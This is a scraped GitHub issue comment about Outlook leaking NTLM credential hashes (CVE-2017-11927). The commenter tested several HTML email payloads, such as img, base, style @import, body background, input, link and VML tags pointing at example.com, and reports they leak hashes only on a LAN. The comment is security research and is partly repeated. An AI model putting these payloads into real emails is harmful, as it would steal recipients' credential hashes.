You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
You are saying:
According to MSRC, the CVE-2017-11927 [2] (that was not released initially as a result of our report) had rectified some of the payloads. This patch was updated in May 2018 to address the remaining issues that were included in this report.
So I tried with 3 years old unpatched outlook 2013 to use these tags in email:
Image tag:
<img src="//example.com/anon/test.txt" >
Base tag + image tag:
<base href="//example.com/IDontExist/">
<img>
Style tag:
</style>
@import 'its:/example.com/foo1/test';
@import url(its:/example.com/foo2/test);
</style>
Body tag (Image):
<body background="its:/example.com/IDontExistNew/foobar">
Input tag (Image):
<input type="image" src="its:/example.com/IDontExistNew/foobar" name="test" value="test">
Link tag (Style):
<link rel="stylesheet" href="its:/example.com/IDontExistNew/foobar" />
VML tag (Image):
<v:background xmlns:v="urn:schemas-microsoft-com:vml">
<v:fill src="its:/example.com/IDontExistNew/foobar" />
</v:background>
None of them are sending NTLM hashes over public, they just seem to work on LAN only.
The text was updated successfully, but these errors were encountered:
You are saying:
According to MSRC, the CVE-2017-11927 [2] (that was not released initially as a result of our report) had rectified some of the payloads. This patch was updated in May 2018 to address the remaining issues that were included in this report.
So I tried with 3 years old unpatched outlook 2013 to use these tags in email:
None of them are sending NTLM hashes over public, they just seem to work on LAN only.
The text was updated successfully, but these errors were encountered: